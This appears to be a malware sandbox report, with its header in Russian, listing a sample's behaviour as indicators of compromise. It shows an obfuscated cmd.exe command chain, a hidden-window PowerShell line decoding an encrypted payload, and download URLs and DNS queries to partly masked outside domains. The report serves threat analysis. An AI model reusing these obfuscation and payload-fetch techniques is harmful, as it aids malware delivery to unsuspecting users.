Техническая информация
- '<SYSTEM32>\cmd.exe' CrfMsHilvUfDi PBWKdEnmTrabsLvaDIUCPSbouFX rtcpfPn & %C^om^S^pEc% %C^om^S^pEc% /V /c set %wYVhdMMGIHdiUbM%=PWNfhlqKrhPdrG&&set %iutKwZNivoIqZT%=p&&set %cNr...
- 'ic###hsense.nl':80
- 'vv#.com.br':80
- 'fa####huleplank.at':80
- 'ce####bozkurt.com':80
- 'ce####bozkurt.com':443
- http://www.ic###hsense.nl/KTTCl4/
- http://www.fa####huleplank.at/2j9e7/
- http://www.ce####bozkurt.com/MPWX0/
- 'ce####bozkurt.com':443
- DNS ASK ic###hsense.nl
- DNS ASK vv#.com.br
- DNS ASK fa####huleplank.at
- DNS ASK ce####bozkurt.com
- DNS ASK av####chasport.cl
- '<SYSTEM32>\cmd.exe' CrfMsHilvUfDi PBWKdEnmTrabsLvaDIUCPSbouFX rtcpfPn & %C^om^S^pEc% %C^om^S^pEc% /V /c set %wYVhdMMGIHdiUbM%=PWNfhlqKrhPdrG&&set %iutKwZNivoIqZT%=p&&set %cNr...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " ( [runTiMe.iNteROpserVICES.MArShaL]::PtrTOSTRIngbStR( [runtime.inTerOPServices.MaRSHAl]::SecUReSTRIngtOBstR( $('76492d1116743f0423413b16050a5345MgB8ADgANABDAHAAbgBJADYAcAA4AGkAawBUADcAaABTAGo...